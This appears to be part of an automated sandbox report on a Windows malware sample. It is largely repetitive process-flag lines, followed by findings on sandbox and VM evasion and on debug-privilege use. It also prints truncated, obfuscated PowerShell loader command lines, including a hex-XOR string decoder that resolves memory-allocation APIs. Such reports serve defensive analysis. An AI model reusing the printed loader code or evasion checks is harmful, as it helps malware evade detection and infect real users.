          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Potential evasive VBS script found (use of timer() function in loop)
          Source: Initial fileInitial file: do while timer-temp<sec
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076Thread sleep count: 730 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076Thread sleep time: -365000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9239Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 730Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSystem information queried: ModuleInformationJump to behavior
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000007.00000002.6648567310.0000000001090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU%
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 7_2_00CDB5B8 LdrInitializeThunk,7_2_00CDB5B8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he 